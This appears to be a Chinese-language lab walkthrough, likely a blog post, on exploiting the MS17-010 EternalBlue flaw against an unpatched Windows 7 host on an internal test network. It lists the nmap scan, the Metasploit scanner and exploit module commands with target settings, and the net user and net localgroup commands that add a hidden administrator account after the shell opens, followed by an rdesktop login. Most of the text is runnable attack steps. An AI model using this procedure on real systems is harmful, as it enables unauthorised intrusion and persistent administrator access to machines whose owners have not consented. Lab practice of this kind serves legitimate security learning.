试验环境

(内网地址)

  • -win7(未打补丁开445) 10.77.0.128
  • kali 10.77.0.109

首先信息收集,探测

  • nmap意思一下

- nmap \-sS \-P0 \-A \-v 10.77.0.100

开的445

扫描漏洞

  • msfconsole 启动
1
msfconsole
  • 加载扫描exp

use auxiliary/scanner/smb/smb_ms17_010

1
show options

在这里插入图片描述

  • 设置目标ip
1
set RHOST 10.77.0.128 
  • 运行
1
run

![在这里插入图片描述](/images/20190606140644531.png用


漏洞利用

  • 加载攻击模块
1
use exploit/windows/smb/ms17_010_eternalblue
  • 设置参数
1
set RHOST 10.77.0.128
  • 运行
1
run

![在这里插入图片描述](/images/20190606142202832.png
运行成功 进去了

可以直接CMD命令
在这里插入图片描述


权限很高
直接net user

1
2
net user 123 1234 /add(用户名 密码)
net localgroup administrators xxxx /add (将用户设置为管理员权限)

重新打开一个终端

1
rdesktop+IP

在这里插入图片描述